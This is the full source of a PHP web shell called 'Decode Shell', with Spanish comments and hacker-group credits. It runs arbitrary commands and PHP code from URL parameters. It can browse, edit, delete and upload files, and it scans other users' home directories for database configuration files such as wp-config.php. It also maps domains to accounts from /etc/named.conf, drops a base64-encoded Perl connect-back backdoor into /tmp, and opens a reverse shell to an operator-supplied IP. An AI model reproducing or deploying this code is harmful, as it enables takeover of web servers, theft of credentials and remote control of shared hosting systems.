1. <html>
  2. <body background="http://i55.tinypic.com/2ic9u6o.gif">
  3. <font color="#ECF8E0">
  4. <?php
  5. //_________________1700000000071
  6. //____________705800711___1778$$$$$01
  7. //________70$501________________7$$$$$$0
  8. //______8$$0______________________1$$$$$$$1
  9. //____8$47_____________1001_________$$$$$$$$1
  10. //___$$7______________$$$$$$________5$$$$$$$$5
  11. //__$$________________$$$$$$7_______5$$$$$$$$$$
  12. //_$$__________________8$$51________$$$$$$$$$$$$
  13. //0$_______________________________5$$$$$$$$$$$$$
  14. //$7_____________________________7$$$$$$$$$$$$$$$
  15. //$____________________________0$$$$$$$$$$$$$$$$$4
  16. //$____________________705$$$$$$$$$$$$$$$$$$$$$$$$
  17. //$________________0$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  18. //$4_____________$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  19. //0$____________$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$7
  20. //_$$__________$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  21. //__$$________1$$$$$$$$$41__0$$$$$$$$$$$$$$$$$$$
  22. //___$$1______0$$$$$$$$$1____4$$$$$$$$$$$$$$$$$
  23. //____8$5_____1$$$$$$$$$8___74$$$$$$$$$$$$$$$5
  24. //_____1$$0____8$$$$$$$$40448$$$$$$$$$$$$$$$
  25. //_______18$57__0$$$$$$$$888$$$$$$$$$$$$$8
  26. //__________708870$$$$$$$$$$$$$$$$$$$$0
  27. //_____________771174$$$$$$$$$$$807
  28. //________________77110000000017
  29. //_____ ______ _____ ____ _____ ______
  30. // | __ \| ____/ ____/ __ \| __ \| ____|
  31. // | | | | |__ | | | | | | | | | |__
  32. // | | | | __|| | | | | | | | | __|
  33. // | |__| | |___| |___| |__| | |__| | |____
  34. // |_____/|______\_____\____/|_____/|______|
  35. // ____ __ __ ____
  36. // | _ \ | \/ | | _ \
  37. // | |_) |_ _ | \ / |_ __| |_) | ___ __ _ _ _ ___ _ _
  38. // | |_) | |_| | | | | | | | |_) | (_) | (_| | |_| | __| |_| |
  39. // |____/ \__, | |_| |_|_| |____/ \___/ \__, |\__,_|\___|\__, |
  40. // __/ ______ __/ | __/ |
  41. // |___|______| |___/ |___/
  42. error_reporting(0); //nos mostrara 0 reportes
  43. $me = basename(__FILE__); // la aplicacion decode
  44. $ruta = dirname(__FILE__)."/";
  45. if(isset($_GET['dir']))
  46. {
  47. chdir($_GET['dir']);
  48. }
  49. $array_codif = Array(
  50. "UTF-8",
  51. "ISO-8859-1",
  52. "ISO-8859-15"
  53. );
  54. //Por defecto
  55. $codificacion = "ISO-8859-1";
  56. $n = "noce";
  57. //si ubiera algo en get
  58. if (isset($_GET)){
  59. foreach($_GET as $campo=>$valor){
  60. switch ($campo) {
  61. //carpeta o archivo
  62. case "file": //archivo
  63. $ruta = htmlspecialchars($valor, ENT_QUOTES);
  64. if (get_magic_quotes_gpc() == 1) $ruta = stripslashes($ruta);
  65. break;
  66. case "una-codificacion":
  67. $codificacion = htmlspecialchars($valor, ENT_QUOTES);
  68. if (get_magic_quotes_gpc() == 1) $codificacion = stripslashes($codificacion);
  69. break;
  70. case "sisinfo":
  71. $cmd = 'set';
  72. echo "<fieldset > <pre>".shell_exec($cmd)."</fieldset></pre>";
  73. break;
  74. case "phpinfo":
  75. phpinfo();
  76. break;
  77. case "scanner":
  78. echo "<h2> <a href=\"?\"> <<**Regresar </a></h2>";
  79. echo "
  80. <fieldset class=\"cmd\">
  81. <h1>leer docuemento[read file]<h1>
  82. <form method=\"GET\" NAME=\"file\" action\"?\">
  83. <INPUT type=\"text\" name=\"file\" class=\"cmd\" size=\"30\">
  84. <input type=\"submit\" class=\"cmd\" name=\"enviar\">
  85. </fieldset></form> </h2>";
  86. echo ''; ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('Error: Safe_mode = On'); set_time_limit(0); @$passwd = fopen('/etc/passwd','r'); if (!$passwd) { die('[-] Error : Coudn`t Read /etc/passwd'); } $pub = array(); $users = array(); $conf = array(); $i = 0; while(!feof($passwd)) { $str = fgets($passwd); if ($i > 100) { $pos = strpos($str,':'); $username = substr($str,0,$pos); $dirz = '/home/'.$username.'/public_html/'; if (($username != '')) { if (is_readable($dirz)) { array_push($users,$username); array_push($pub,$dirz); } } } $i++; } echo '
  87. Scanconfig 4.0
  88. Created by uzanc | 2011 - Tangerang - Indonesia
  89. Dedicated To : www.code-security.com - www.hacker-cisadane.org
  90. Thank to : Yogyacarderlink - Indonesian Cyber - Hacker Newbie - Devilzc0de - Lumajangcrew And All Forum Hacker Indonesia<br><br>
  91. [+]=====================================[ START ]========================================[+]<br>
  92. '; foreach ($users as $user) { echo "\n <br>
  93. [+]---------------------------------- [ SCAN CONFIG ]-------------------------------------[+]<br>
  94. \n"; $path = "/home/$user/public_html/"; read_dir($path,$user); } echo "\n
  95. [+]=====================================[ FINISH ]========================================[+]<br><br>
  96. \n"; echo "\n [+] Scanners have been completed | Thank you been using this tools [+]<br><br><br><br>\n"; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath = "$path$file"; if (($file != '.') and ($file != '..')) { if (is_readable($fpath)) { $dr = $fpath."/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if ( ($file=='config.php') or ($file=='config.inc.php') or ($file=='conf.php') or ($file=='settings.php') or ($file=='wp_config.php') or ($file=='inc.php') or ($file=='config.php') or ($file=='globals.php') or ($file=='settings.php') or ($file=='setup.php') or ($file=='dbconf.php') or ($file=='setup.php') or ($file=='common.php') or ($file=='config_global.php') or ($file=='db_connect.php') or ($file=='var.php') or ($file=='global.inc.php') or ($file=='global.php') or ($file=='config.inc') or ($file=='mysql.php') or ($file=='const.inc.php') or ($file=='dbc.php') or ($file=='dbconfig.php') or ($file=='db_settings.php') or ($file=='dbsettings.php') or ($file=='_config.php') or ($file=='db.inc.php') or ($file=='dbconnect.php') or ($file=='CHANGELOG.php') or ($file=='connect.php') or ($file=='configure.php') or ($file=='connect.php') or ($file=='config_global.php') or ($file=='configuration.php') or ($file=='db.php') or ($file=='connect.inc.php') or ($file=='dbconnect.inc.php') or ($file=='konek.php') or ($file=='koneksi.php') or ($file=='setting.php') or ($file=='wp-config.php') or ($file=='db.php') or ($file=='master.php') or ($file=='include.php') or ($file=='includes.php') or ($file=='conect.php') or ($file=='database.php') or ($file=='DB.php') or ($file=='settings.php') or ($file=='func.php') or ($file=='konfig.php') or ($file=='konfigurasi.php') or ($file=='function.php') or ($file=='functions.php') or ($file=='configure.php') or ($file=='conection.php')) { echo " [+] $fpath\n
  97. "; } } } } } } } echo '';
  98. break;
  99. case 'delete': //Delete a file
  100. if(isset($_POST['yes']))
  101. {
  102. if(unlink($_GET['file']))
  103. {
  104. print "Archivo Borrado";
  105. }
  106. else
  107. {
  108. print "NO SE PUDO BORRAR OPERACION FALLIDA O ARCHIVO NO ENCONTRADO";
  109. }
  110. }
  111. if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
  112. {
  113. print " <fieldset class=\"fielset1\"> <legend> Desea Eliminar</legend> ".$_GET['file']."?<br>
  114. <form action=\"".$me."?echo&delete&file=".$_GET['file']."\" method=POST>
  115. <input type=hidden name=yes value=yes>
  116. <center> <input type=submit value=\"Si [borrar]\"> </center></fieldset>
  117. ";
  118. }
  119. break;
  120. case 'edit': //Edit a fie
  121. if(isset($_POST['editform']))
  122. {
  123. $f = $_GET['file'];
  124. $fh = fopen($f, 'w') or print "Error al abrir archivo!";
  125. fwrite($fh, $_POST['editform']) or print "no se pudo fuardar el archivo!";
  126. fclose($fh);
  127. }
  128. print "<font color=white >";
  129. print "<legend> Editar Archivo </legend> <b>".$_GET['file']."</b> <br><br><form action=\"".$me."?echo&edit&file=".$_GET['file']."\" method=POST> <table border=1><td><td><fieldset ><legend>Eddicion</legend><textarea cols=90 rows=15 name=\"editform\">";
  130. if(file_exists($_GET['file']))
  131. {
  132. $rd = file($_GET['file']);
  133. foreach($rd as $l)
  134. {
  135. print htmlspecialchars($l);
  136. }
  137. }
  138. print "</textarea> </fieldset> <td><td></table><input type=submit value=\"Save\"></form>";
  139. break;
  140. case "echo":
  141. print " <script>alert('se salvo el documento correctamente')</script> <font size=\"5\"> ---------SE EDITO CORRECTAMENTE EL ARCHIVO ------</font> ";
  142. echo "<script>setTimeout('top.location = \'?file=\'', 1000);</script>";
  143. break;
  144. case 'rename': //renombrar
  145. if(isset($_POST['fileold']))
  146. {
  147. if(rename($_POST['fileold'],$_POST['filenew']))
  148. {
  149. print "Archivo Renombrado.";
  150. }
  151. else
  152. {
  153. print "NO SE PUDO RENOMBRAR EL ARCHIVO FAILED!.";
  154. }
  155. }
  156. if(isset($_GET['file']))
  157. {
  158. $file = basename(htmlspecialchars($_GET['file']));
  159. }
  160. else
  161. {
  162. $file = "";
  163. }
  164. print "en la carpeta ".realpath('.').".<br>
  165. <form action=\"".$me."?rename&dir=".realpath('.')."\" method=POST>
  166. <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
  167. <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
  168. <input type=submit value=\"Rename file\">
  169. </form>";
  170. break;
  171. case 'upload':
  172. if(isset($_FILES['uploadedfile']['name']))
  173. {
  174. $target_path = realpath('.').'/';
  175. $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  176. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  177. print "File:". basename( $_FILES['uploadedfile']['name']).
  178. " se ha subido el archivo";
  179. } else{
  180. echo "Decode tubo problemas al subir el archivo";
  181. }
  182. }
  183. break;
  184. case 'ok':
  185. print " <script>alert('se salvo el documento correctamente')</script> <font size=\"5\"> ---------SE EDITO CORRECTAMENTE EL ARCHIVO ------</font> ";
  186. echo "<script>setTimeout('top.location = \'?file=\'', 2000);</script>";
  187. break;
  188. case 'domains':
  189. echo "<a href=?>REGRESAR SHELL [DECODE] </a>";
  190. echo "<title># Domains & Users</title>
  191. <style>
  192. font-family:Verdana,tahoma; color: white; font-size:10px; }
  193. A:link {text-decoration: none;color: red;}
  194. A:active {text-decoration: none;color: red;}
  195. A:visited {text-decoration: none;color: red;}
  196. A:hover {text-decoration: underline; color: red;}
  197. #new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
  198. tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
  199. </style>
  200. <p align=center># Domains & Users</p>
  201. <p align=center>Karar alShaMi t00l with PHP .. Maked By Lagripe-Dz ..?!</p><center>";
  202. $d0mains = @file("/etc/named.conf");
  203. if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }
  204. echo "<table align=center border=1>
  205. <tr bgcolor=green><td>d0mains</td><td>users</td></tr>";
  206. foreach($d0mains as $d0main){
  207. if(eregi("zone",$d0main)){
  208. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  209. flush();
  210. if(strlen(trim($domains[1][0])) > 2){
  211. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  212. echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();
  213. }}}
  214. echo "</table>
  215. <p align='center'>
  216. (c)0d3d By <a href='https://www.facebook.com/ZHCtehUnstopable'>THA Disastar</a> | <a href='https://www.facebook.com/ZHCtehUnstopable'>https://www.facebook.com/ZHCtehUnstopable</a><br>
  217. MaDe in THA Disastar 2o11 (r)
  218. </p>
  219. ";
  220. break;
  221. case 'decode64' ;
  222. if (isset($_GET['decode64'])) {
  223. echo"<fieldset class=\"fieldset1\"> ";
  224. echo '<center><h2>Base64 encode/decoder</h2><br>
  225. <form action="" method=POST>
  226. <b>Encode :</b> <input type=text class=\"input\"name=code size=50><input type=submit class=\"button\" name=cod value=Encode>
  227. </form>
  228. <form action="" method=POST>
  229. <b>Decode :</b> <input type=text name=decode size=50><input type=submit class=\"button\" name=deco value=Decode>
  230. </form></center></fieldset>
  231. ';
  232. }
  233. if (isset($_POST['cod'])) {
  234. echo "<center>";
  235. echo "<br><br>Texto<br><br><fieldset>".$_POST['code']."</fieldset><br><br>Resultado<br><br><fieldset>";
  236. echo base64_encode($_POST['code']) ;
  237. echo "</fieldset></center><br><br>";
  238. }
  239. if (isset($_POST['deco'])) {
  240. echo "<center><br><br><br><br><fieldset>".$_POST['decode']." </fieldset><br><br>Result<br><br><fieldset>";
  241. echo base64_decode($_POST['decode']);
  242. echo "</fieldset></center><br><br>";
  243. }
  244. break;
  245. case 'exec';
  246. echo "
  247. <h1>Consola Ejecutar :</h1>
  248. <FORM METHOD=\"GET\" NAME=exec ACTION=\"?\">
  249. <INPUT TYPE=\"text\" class=\"cmd\" NAME=exec size=\"30\" >
  250. <INPUT TYPE=\"submit\" VALUE=\"Enviar\">
  251. </FORM>
  252. </fieldset>
  253. <hr>
  254. <pre> ";
  255. echo "<textarea cols=\"55\" rows=\"30\" class=\"cmd\" >";
  256. $var = $_GET['exec'];
  257. $sysm = system($var);
  258. echo "</textarea>";
  259. break;
  260. case 'te';
  261. echo " }
  262. <center>
  263. <h2> introduce codigo</h2>
  264. <form action=? method=\"GET\">
  265. <textarea value=\"te\" name=\"te\"></textarea>
  266. <input type=\"submit\" value = \"enviar\">
  267. </form>
  268. ";
  269. echo "resultado <textarea rows=\"5\" cols=\"105\">";
  270. if (isset($_GET['te'])) {
  271. $eva = eval($_GET['te']) ;
  272. echo "</textarea>";
  273. }
  274. break;
  275. case 'backdoor1';
  276. $gf = "/tmp/bc.pl";
  277. $f = fopen($gf,'w');
  278. $def = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiMgUHJpdjggKiogUHJpdjggKiogUHJpdjgNCiMgSVJBTiBIQUNLRVJTIFNBQk9UQUdFIENvbm5lY3QgQmFjayBTaGVsbA0KIyBjb2RlIGJ5OkxvckQNCiMgV2UgQXJlIDpMb3JELUMwZDNyLU5ULVx4OTANCiMgRW1haWw6TG9yREBpaHN0ZWFtLmNvbQ0KIw0KI2xvcmRAU2xhY2t3YXJlTGludXg6L2hvbWUvcHJvZ3JhbWluZyQgcGVybCBkYy5wbA0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0NCiMNCiNVc2FnZTogZGMucGwgW0hvc3RdIFtQb3J0XQ0KIw0KI0V4OiBkYy5wbCAxMjcuMC4wLjEgMjEyMQ0KI2xvcmRAU2xhY2t3YXJlTGludXg6L2hvbWUvcHJvZ3JhbWluZyQgcGVybCBkYy5wbCAxMjcuMC4wLjEgMjEyMQ0KIy0tPT0gQ29ubmVjdEJhY2sgQmFja2Rvb3IgU2hlbGwgdnMgMS4wIGJ5IExvckQgb2YgSVJBTiBIQUNLRVJTIFNBQk9UQUdFID09LS0NCiMNCiNbKl0gUmVzb2x2aW5nIEhvc3ROYW1lDQojWypdIENvbm5lY3RpbmcuLi4gMTI3LjAuMC4xDQojWypdIFNwYXduaW5nIFNoZWxsDQojWypdIENvbm5lY3RlZCB0byByZW1vdGUgaG9zdA0KDQojYmFzaC0yLjA1YiMgbmMgLXZ2IC1sIC1wIDIxMjENCiNsaXN0ZW5pbmcgb24gW2FueV0gMjEyMSAuLi4NCiNjb25uZWN0IHRvIFsxMjcuMC4wLjFdIGZyb20gbG9jYWxob3N0IFsxMjcuMC4wLjFdIDMyNzY5DQojLS09PSBDb25uZWN0QmFjayBCYWNrZG9vciB2cyAxLjAgYnkgTG9yRCBvZiBJUkFOIEhBQ0tFUlMgU0FCT1RBR0UgPT0tLQ0KIw0KIy0tPT1TeXN0ZW1pbmZvPT0tLQ0KI0xpbnV4IFNsYWNrd2FyZUxpbnV4IDIuNi43ICMxIFNNUCBUaHUgRGVjIDIzIDAwOjA1OjM5IElSVCAyMDA0IGk2ODYgdW5rbm93biB1bmtub3duIEdOVS9MaW51eA0KIw0KIy0tPT1Vc2VyaW5mbz09LS0NCiN1aWQ9MTAwMShsb3JkKSBnaWQ9MTAwKHVzZXJzKSBncm91cHM9MTAwKHVzZXJzKQ0KIw0KIy0tPT1EaXJlY3Rvcnk9PS0tDQojL3Jvb3QNCiMNCiMtLT09U2hlbGw9PS0tDQojDQokc3lzdGVtID0gJy9iaW4vYmFzaCc7DQokQVJHQz1AQVJHVjsNCnByaW50ICJJSFMgQkFDSy1DT05ORUNUIEJBQ0tET09SXG5cbiI7DQppZiAoJEFSR0MhPTIpIHsNCnByaW50ICJVc2FnZTogJDAgW0hvc3RdIFtQb3J0XSBcblxuIjsNCmRpZSAiRXg6ICQwIDEyNy4wLjAuMSAyMTIxIFxuIjsNCn0NCnVzZSBTb2NrZXQ7DQp1c2UgRmlsZUhhbmRsZTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCBnZXRwcm90b2J5bmFtZSgndGNwJykpIG9yIGRpZSBwcmludCAiWy1dIFVuYWJsZSB0byBSZXNvbHZlIEhvc3RcbiI7DQpjb25uZWN0KFNPQ0tFVCwgc29ja2FkZHJfaW4oJEFSR1ZbMV0sIGluZXRfYXRvbigkQVJHVlswXSkpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gQ29ubmVjdCBIb3N0XG4iOw0KcHJpbnQgIlsqXSBSZXNvbHZpbmcgSG9zdE5hbWVcbiI7DQpwcmludCAiWypdIENvbm5lY3RpbmcuLi4gJEFSR1ZbMF0gXG4iOw0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbCBcbiI7DQpwcmludCAiWypdIENvbm5lY3RlZCB0byByZW1vdGUgaG9zdCBcbiI7DQpTT0NLRVQtPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgIj4mU09DS0VUIik7DQpvcGVuKFNURE9VVCwiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCI+JlNPQ0tFVCIpOw0KcHJpbnQgIklIUyBCQUNLLUNPTk5FQ1QgQkFDS0RPT1IgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAtLT09U3lzdGVtaW5mbz09LS0gOyB1bmFtZSAtYTtlY2hvOw0KZWNobyAtLT09VXNlcmluZm89PS0tIDsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tIDsgcHdkO2VjaG87IGVjaG8gLS09PVNoZWxsPT0tLSAiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCiNFT0Yg
  279. ";
  280. fwrite($f, base64_decode($def));
  281. fclose($f);
  282. echo "<font size=\"5\"><a href=\"?exec=\">Ejecutar</a></font>";
  283. echo "EXEXCUATAR /tmp/bc.pl ip & port <br> EXAMPLE :/tmp/bc.pl 189.0.0.1 2121";
  284. break;
  285. case 'backs';
  286. //Connect Back -Firewall Bypass
  287. if (isset($_GET['backs'])){
  288. echo " <fieldset class=\"cmd\"> <br>Connect back Shell , bypass Firewalls<br>
  289. For user :<br>
  290. nc -l -p 1019 <br>
  291. <hr>
  292. <form method='POST' action=''><br>
  293. Your IP & BindPort:<br>
  294. <input type='text' class=\"cmd\" size='25' name='mip' >
  295. <input type='text' class=\"cmd\" name='bport' size='5' value='1019'><br>
  296. <input type='submit' value='Connect Back'>
  297. </fieldset></form>";
  298. $mip=$_POST['mip'];
  299. $bport=$_POST['bport'];
  300. if ($mip <> "")
  301. {
  302. $fp=fsockopen($mip , $bport , $errno, $errstr);
  303. if (!$fp){
  304. $result = "Error: could not open socket connection";
  305. }
  306. else {
  307. fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
  308. while(!feof($fp)){
  309. fputs ($fp," bash # ");
  310. $result= fgets ($fp, 4096);
  311. $message=`$result`;
  312. fputs ($fp,"--> ".$message."\n");
  313. }
  314. fclose ($fp);
  315. }
  316. }
  317. }
  318. break;
  319. case 'mail';
  320. echo "
  321. <form method='post' name='Emailform' action='?mail&send' target='_self' onSubmit='return checkemail(this)'>
  322. <table border='0' cellspacing='0' cellpadding='4' width='90%' id='ContactMe'>
  323. <tr>
  324. <td width='30%'><div align='right'>Name:</div></td>
  325. <td width='70%'><input type='text' name='name' size='30' /></td>
  326. </tr>
  327. <tr>
  328. <td><div align='right'>Email:</div></td>
  329. <td><input type='text' name='email' size='30' /></td>
  330. </tr>
  331. <tr>
  332. <td><div align='right'>Website:</div></td>
  333. <td><input type='text' name='site' size='30' /></td>
  334. </tr>
  335. <tr>
  336. <td><div align='right'>Message:</div></td>
  337. <td><textarea name='message' cols='40' rows='4'></textarea></td>
  338. </tr>
  339. <tr>
  340. <td>&nbsp;</td>
  341. <td>
  342. <input type='submit' name='submit' value='Submit' />
  343. <input type='reset' name='reset' value='Reset' />
  344. </td>
  345. </tr>
  346. </table>
  347. </form>
  348. ";
  349. break;
  350. case 'send';
  351. $email = $_REQUEST['email'] ;
  352. $name = $_REQUEST['name'] ;
  353. $site = $_REQUEST['site'] ;
  354. $subject = "Message from: $name";
  355. $message = $_REQUEST['message'] ;
  356. $headers = "[email protected]";
  357. $body = "From: $name \n\n Email: $email \n\n Wesbite: $site \n\n Message: $message";
  358. $sent = mail($to, $subject, $body, $headers) ;
  359. if($sent)
  360. {echo "MENSAJE ENVIADO";}
  361. else
  362. {echo "MENSAJE NO ENVIADO";}
  363. }
  364. }
  365. }
  366. if ($ruta == "") $ruta = dirname(__FILE__)."/";
  367. $presenta_nodos = "";
  368. $presenta_archivo = "";
  369. if (is_dir($ruta)){//Abrir Carpeta
  370. $ruta = realpath($ruta)."/";
  371. $presenta_nodos = explora_ruta($ruta);
  372. } else {// Ver Archivo
  373. $ruta = realpath($ruta);
  374. $presenta_nodos = explora_ruta(dirname($ruta)."/");
  375. $presenta_archivo = "<br />Contenido : ".
  376. $ruta."<pre>".
  377. explora_archivo($ruta, $codificacion).
  378. "</pre>";
  379. }
  380. function explora_ruta($ruta){
  381. $cadena = "";
  382. $barra = "";
  383. $xsf = $_GET['file'];
  384. $manejador = @dir($ruta);
  385. while ($recurso = $manejador->read()){
  386. $nombre = "$ruta$recurso";
  387. if (@is_dir($nombre)) {//ES UNA CARPETA
  388. //Agregamos la barra al final
  389. $barra = "/";
  390. $cadena .= "Abrir Carpeta:> ";
  391. $xsf = "";
  392. } else {//ES UN ARCHIVO
  393. //No agregamos barra
  394. $barra = "";
  395. $cadena .= "Abrir Op <a href=\"?delete&file=".realpath($nombre)."\"> [-D-]</a> &nbsp;&nbsp; <a href=\"?edit&file=".realpath($nombre)."\">[-E-]</a>&nbsp;&nbsp; <a href=\"?rename&file=".realpath($nombre)."\">[R]</a>&nbsp;&nbsp;";
  396. $xsf = "gs";
  397. }
  398. if (@is_readable($nombre)){
  399. $cadena .= "<a href=\"".$_SERVER["PHP_SELF"].
  400. "?file=$nombre$barra\">$recurso$barra</a>";
  401. } else {
  402. $cadena .= "$recurso$barra";
  403. }
  404. $cadena .= "<br />";
  405. }
  406. $manejador->close();
  407. return $cadena;
  408. }
  409. function explora_archivo($ruta, $codif){
  410. ob_start();
  411. readfile($ruta);
  412. $contenido = ob_get_contents();
  413. ob_clean();
  414. return htmlentities($contenido, ENT_QUOTES, $codif);
  415. }
  416. //declarando datos
  417. $server = $_SERVER['SERVER_SOFTWARE'] ;
  418. $addres = $_SERVER['SERVER_ADDR'];
  419. $doc = $_SERVER['DOCUMENT_ROOT'] ;
  420. $php = $_SERVER['SERVER_ADMIN'] ;
  421. $uname = php_uname();
  422. ///sacando files
  423. ?>
  424. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  425. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  426. <html xmlns="http://www.w3.org/1999/xhtml" lang="es" xml:lang="es">
  427. <head>
  428. <script>
  429. </script>
  430. <script language=javascript>
  431. /// BARRA PRESENTACION
  432. var rev = "fwd";
  433. function titlebar(val)
  434. {
  435. var msg = "Decode Shell V.1 *Mr_BOGEY * [ ZeroxHack ]";
  436. var res = " ";
  437. var speed = 50;
  438. var pos = val;
  439. msg = " "+msg+"";
  440. var le = msg.length;
  441. if(rev == "fwd"){
  442. if(pos < le){
  443. pos = pos+1;
  444. scroll = msg.substr(0,pos);
  445. document.title = scroll;
  446. timer = window.setTimeout("titlebar("+pos+")",speed);
  447. }
  448. else{
  449. rev = "bwd";
  450. timer = window.setTimeout("titlebar("+pos+")",speed);
  451. }
  452. }
  453. else{
  454. if(pos > 0){
  455. pos = pos-1;
  456. var ale = le-pos;
  457. scrol = msg.substr(ale,le);
  458. document.title = scrol;
  459. timer = window.setTimeout("titlebar("+pos+")",speed);
  460. }
  461. else{
  462. rev = "fwd";
  463. timer = window.setTimeout("titlebar("+pos+")",speed);
  464. }
  465. }
  466. }
  467. titlebar(0);
  468. ///BARRA FIN
  469. </script>
  470. <meta http-equiv="X-UA-Compatible" content="IE=8" />
  471. ...
  472. <style type="text/css">
  473. p.one
  474. {
  475. border-style:solid;
  476. border-color:#0000ff;
  477. }
  478. .input {
  479. border: 1px solid #006;
  480. background: #ffc;
  481. }
  482. .button {
  483. border: 1px solid #006;
  484. background: #3ADF00;
  485. }
  486. .fieldset
  487. {
  488. color:#00f;
  489. background-color:#585858;
  490. }
  491. .fieldset1
  492. {
  493. color:#298A08;
  494. background-color:#04B404;
  495. }
  496. .tablas
  497. {
  498. color:#FF0040;
  499. background-color:#00FFFF;
  500. font-size:0.875em;
  501. }
  502. .cmd
  503. {
  504. background-color:#848484;
  505. }
  506. .textss
  507. body {
  508. font-family: “Kimberley”;
  509. }
  510. </style>
  511. <style type=”text/css” media=”screen”>
  512. @font-face {
  513. font-family: “Kimberley”;
  514. src: url(http://www.miservidor.com/fuentes/kimberle.ttf) format(“truetype”);
  515. }
  516. </style>
  517. </head>
  518. <font color="red">
  519. <body>
  520. </font><center>
  521. <img src="https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash3/564758_222391781222196_2001780541_n.jpg" alt height="150" width="600">
  522. <h1> <font color="green"> Break <font color="#FFFFFF"> Security <font color="RED"> Hackers & Mr_Boguey!!! </font></font></font></h1>
  523. <ul></center>
  524. <font size="5">
  525. <?php
  526. //server
  527. $spa = $espacio_disponible / 1000000000 ." GB";
  528. $opciones = " ";
  529. if (ini_get("safe_mode")){
  530. $opciones .= " On<br>";
  531. } else {
  532. $opciones .= " Off<br>";
  533. }
  534. echo "Safe Mode .$opciones";
  535. echo "<table border=\"2\" class=\"tablas\">
  536. <tbody>
  537. <tr>
  538. <td>Ip Addres </td>
  539. <td>admin </td>
  540. <td>root </td>
  541. <td>Sis Web </td>
  542. </tr>
  543. <tr>
  544. <td>$addres</td>
  545. <td>$php</td>
  546. <td>$doc</td>
  547. <td>$server<td>
  548. </tr>
  549. <tr>
  550. <td>Espacio Disp </td>
  551. <td>Safe_Mode </td>
  552. <td> O.s </td>
  553. <th>Credits</th>
  554. </tr>
  555. <tr>
  556. <th></th>
  557. <th>$opciones</th>
  558. <td>$uname</td>
  559. <th>Created By Mr_Bogey & Break Secuirty </th>
  560. </tr>
  561. </tbody>
  562. </table>
  563. ";
  564. ?>
  565. <br>
  566. <br>
  567. <br>
  568. <fieldset class="fieldset1"> -*-*<a href=<?php echo $me; ?>><code> inicio </a>-*-*<a href="?sisinfo">infoSistem </a>-*-* <a href="?phpinfo= "> PhpInfo </a> -*-* <code> <a href="?scanner" > Scanner Jump</a>-*-* <a href="?domains"><code>Scan Dominios </a></code>-*-* <a href="?decode64"><code>Base64</code></a>-*-* <a href="?exec"><code>[CMD]</code></a></fieldset>
  569. </font>
  570. </ul>
  571. <style type="text/css">
  572. a:link { color: yellow; }
  573. .especial:link { color: green; }
  574. </style>
  575. <h3>Ir Ah Carpeta</h3>
  576. <form action="<?php echo $_SERVER["PHP_SELF"] ?>" method="get">
  577. Ruta <small>(En Windows pueden usarse ambas barras "/" y "\")</small>
  578. <br /><br><input type="text" name="una-ruta> <br>"
  579. ><br><?php echo $ruta; ?> </textarea><br />
  580. Codificación para ver archivos por codificacion win:
  581. <select name="una-codificacion">
  582. <?php
  583. foreach ($array_codif as $i=>$val){
  584. echo "<option value=\"$val\"";
  585. if ($codificacion == $val) echo " selected=\"selected\"";
  586. echo ">$val</option>";
  587. }
  588. ?>
  589. </select><br />
  590. <input type="submit" value="enviar" />
  591. </form>
  592. <h4><br> <fieldset style="color:#00FFFF; background-color:#151515 "><?php echo "$presenta_archivo"; ?> </fieldset> </h4>
  593. <h2> [-D-] Delete&Borrar &nbsp; [-E-] Edit&Editar &nbsp; [-R-] Rename&Renombrar&nbsp; [-P-] Permissions&Permisos </h2>
  594. <h4><br><fieldset style="color:#00f; background-color:#151515 "> <?php echo "$presenta_nodos"; ?> </fieldset> </h4>
  595. </body>
  596. </html>
  597. <hr>
  598. <fieldset class="fieldset">
  599. <legend> ejecutar </legend>
  600. <h1><font face="Courier" size="6">Consola Ejecutar :</FONT></h1>
  601. <FORM METHOD="GET" NAME="consol" ACTION="?">
  602. <INPUT TYPE="text" class="text" NAME="cmd" size="30" >
  603. <INPUT TYPE="submit" class="button" VALUE="Enviar">
  604. </FORM>
  605. </fieldset>
  606. <hr>
  607. <pre>
  608. <?php
  609. $var = $_GET['cmd'];
  610. system($var);
  611. ?>
  612. <fieldset class="fieldset">
  613. <legend> Mr_Dir [crear Directorio] </legend>
  614. <h1><font face="Courier" size="6">Mkdir :</FONT></h1>
  615. <FORM METHOD="POST" NAME="make" ACTION="?">
